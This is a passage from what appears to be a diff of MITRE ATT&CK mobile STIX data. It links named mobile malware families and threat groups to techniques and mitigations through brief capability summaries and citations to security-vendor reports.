"https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.745Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has accessed the list of installed apps.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a1fac829-275a-409a-9060-e7bd7c63057e", + "type": "relationship", + "created": "2020-12-18T20:14:47.375Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "modified": "2020-12-18T20:14:47.375Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) can obtain a list of installed apps.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0d305e1e-df8f-4028-bf6f-1d7fed9e6184", + "created": "2022-03-30T17:53:56.805Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T17:53:56.805Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "target_ref": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--23ecc134-0623-45ec-b8b5-52516483bda1", + "created": "2023-04-14T14:10:04.452Z", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-14T14:10:04.452Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) has used code abstraction and anti-emulation checks to potentially avoid running while under analysis.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--82f51cc6-6ce4-459e-b598-7b2b77983469", + "created": "2020-04-24T15:06:33.526Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. 
Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:28:18.530Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect SMS messages.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d6be8665-afbb-4be5-a56a-493af01b120a", + "created": "2022-03-30T15:52:29.935Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products can potentially detect jailbroken or rooted devices.", + "modified": "2022-03-30T15:52:29.935Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--62623afc-8222-4d59-b5d0-7bc1ccc7fadc", + "created": "2023-02-06T19:41:40.104Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. 
- A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:35:04.072Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can silently intercept and manipulate notifications. [S.O.V.A.](https://attack.mitre.org/software/S1062) can also inject cookies via push notifications.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--89565753-23c4-422d-a9ba-39f4101cd819", + "type": "relationship", + "created": "2020-11-20T16:37:28.485Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-11-20T16:37:28.485Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can track the device’s location.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--abd2e863-4bd3-4686-b2aa-f8a097a41c99", + "created": "2017-10-25T14:48:53.742Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Elcomsoft-iOSRestricted", + "url": "https://blog.elcomsoft.com/2018/09/ios-12-enhances-usb-restricted-mode/", + "description": "Oleg Afonin. (2018, September 20). iOS 12 Enhances USB Restricted Mode. Retrieved September 21, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "iOS 11.4.1 and higher introduce USB Restricted Mode, which disables data access through the device's charging port under certain conditions (making the port only usable for power), likely preventing this technique from working.(Citation: Elcomsoft-iOSRestricted)", + "modified": "2022-04-01T15:35:28.360Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b0625604-e4c4-402b-b191-f43137d38d99", + "created": "2020-11-20T15:44:57.481Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + 
"external_references": [ + { + "source_name": "Symantec GoldenCup", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:29:50.160Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect sent and received SMS messages.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6885280e-5423-422a-94f1-e91d557e043e", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "PaloAlto-XcodeGhost1", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/", + "description": "Claud Xiao. (2015, September 17). Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store. Retrieved December 21, 2016." + }, + { + "source_name": "PaloAlto-XcodeGhost", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/", + "description": "Claud Xiao. (2015, September 18). Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) was injected into apps by a modified version of Xcode (Apple's software development tool).(Citation: PaloAlto-XcodeGhost1)(Citation: PaloAlto-XcodeGhost)", + "modified": "2022-04-15T15:10:16.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "target_ref": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--58c857f8-4f40-48e0-b3ac-41944d82b576", + "created": "2020-12-24T22:04:27.991Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:54:02.223Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has collected a list of contacts.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6ce36374-2ff6-4b41-8493-148416153232", + "type": "relationship", + "created": "2020-07-20T13:27:33.443Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." 
+ } + ], + "modified": "2020-08-10T21:57:54.526Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can collect user account, photos, browser history, and arbitrary files.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--991ef2f2-c196-4d5d-bd29-504ea25831f4", + "type": "relationship", + "created": "2021-10-01T14:42:48.815Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-01T14:42:48.815Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can record from the device’s camera.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--520c7112-9768-42c5-8917-1950efd182f9", + "created": "2023-02-06T19:38:45.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. 
Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:33:30.155Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can use keylogging to capture user input.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--046acda0-91de-4385-bcfb-157570d8e51d", + "created": "2023-03-30T15:25:00.442Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. 
Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T15:26:46.611Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can search for installed applications that match a list of targets.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--42f8d024-64a7-4bbf-8c05-2b0c7e667396", + "type": "relationship", + "created": "2020-12-14T15:02:35.304Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." 
+ } + ], + "modified": "2020-12-14T15:02:35.304Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) has stored encrypted strings in the APK file.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9366529d-fba9-4ef6-b4ee-b6b41aa3b18c", + "type": "relationship", + "created": "2019-07-10T15:35:43.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.741Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) queries the device for metadata, such as device ID, OS version, and the number of cameras.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f776a4da-0fa6-414c-a705-e9e8b419e056", + "type": "relationship", + "created": "2020-06-26T15:32:25.058Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + }, + { + "source_name": "CheckPoint Cerberus", + "url": "https://research.checkpoint.com/2020/mobile-as-attack-vector-using-mdm/", + "description": "A. Hazum, B. Melnykov, C. Efrati, D. Golubenko, I. Wernik, L. Kuperman, O. Mana. (2020, April 29). First seen in the wild – Malware uses Corporate MDM as attack vector. Retrieved June 26, 2020." 
+ } + ], + "modified": "2020-06-26T15:32:25.058Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can inject input to grant itself additional permissions without user interaction and to prevent application removal.(Citation: Threat Fabric Cerberus)(Citation: CheckPoint Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8b27a786-b4d9-4014-a249-3725442f9f1d", + "type": "relationship", + "created": "2021-01-05T20:16:20.499Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." 
+ } + ], + "modified": "2021-01-05T20:16:20.499Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can obtain a list of installed applications.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1b7be26d-cb1d-497b-94bf-a34f11ed66c9", + "type": "relationship", + "created": "2020-09-11T14:54:16.548Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-11T14:54:16.548Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can obtain a list of installed applications.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ac53e382-a140-4bbf-a59d-db3fe21acfaa", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--a9cab8f6-4c94-4c9b-9e7d-9d863ff53431", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3ebcd3d8-dd8e-4cc9-8087-ce9e93df6f56", + "created": "2017-10-25T14:48:53.738Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 9 introduced a new security policy that prevents applications from reading or writing data to other applications’ internal storage directories, regardless of permissions. 
", + "modified": "2022-04-01T13:51:48.934Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7017085c-c612-48b2-b655-e18d7822d0e7", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:39:48.895Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) harvests phone call history from victims.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4bdda427-2fff-428d-ba19-4bee5d2508e1", + "type": "relationship", + "created": "2021-02-08T16:36:20.801Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": 
"https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.571Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included video recording in the malicious apps deployed as part of Operation BULL.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c81757a7-16b1-4b48-ae52-3d375f533dfd", + "created": "2022-04-01T15:03:02.553Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T15:03:02.553Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eee008fa-a46f-4542-93e3-8fe5f949130f", + "created": "2023-01-19T18:06:57.242Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. 
